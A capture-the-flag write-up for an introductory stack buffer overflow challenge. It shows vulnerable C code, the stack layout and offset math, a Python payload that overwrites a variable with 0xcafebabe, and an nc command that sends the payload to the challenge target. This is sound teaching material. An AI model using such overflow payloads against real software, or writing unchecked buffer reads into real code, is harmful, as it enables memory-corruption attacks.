2023 Cyber Apocalypse: Getting Started

Challenge Information

Summary

This is an introductory buffer overflow challenge where a C program reads user input into a buffer that is too small, allowing stack corruption. The goal is to overwrite the target value (0xcafebabe) by crafting a precise payload that reaches it on the stack.

Analysis

The vulnerable C code:

void vuln(){
    char buffer[0x20] = {0};  // 32-byte buffer
    fprintf(stdout, "\nEnter payload here: ");
    fgets(buffer, 0x100, stdin);  // Reads up to 256 bytes!
}

Vulnerability: The function reads 0x100 (256) bytes into a 0x20 (32) byte buffer, causing a buffer overflow.

The program displays the stack layout:

0x00007ffe2273d100 | 0x4141414141414141 <- Start of buffer
0x00007ffe2273d120 | 0x4242424242424242 <- Dummy value for alignment
0x00007ffe2273d128 | 0x8ac3bec3bac2bec2 <- Target to change

Solution

The exploitation strategy:

1. Identify offset to target: The target is at offset 0x28 from buffer start (40 bytes)
2. Craft payload:
   • 32 ‘A’s to fill the buffer
   • 8 ‘B’s for alignment/dummy value
   • Target value 0xcafebabe in little-endian format

Payload generation:

payload = 32 * 'A' + 8 * 'B' + '\xbe\xba\xfe\xca'

with open('payload.txt', 'wb') as f:
    f.write(payload.encode('latin-1'))

Delivery method:

cat payload.txt | nc TARGET_IP TARGET_PORT

Expected output: The program displays memory contents and prints the flag when the target value is successfully overwritten.

Key Takeaways

• Buffer overflow vulnerabilities occur when input size is not properly validated
• Stack-based overflows allow overwriting local variables and return addresses
• Precise offset calculation is critical for successful exploitation
• Understanding stack layout is essential for crafting working exploits
• Little-endian byte order must be considered when writing multi-byte values
• fgets(buffer, size, stdin) is dangerous if size exceeds buffer capacity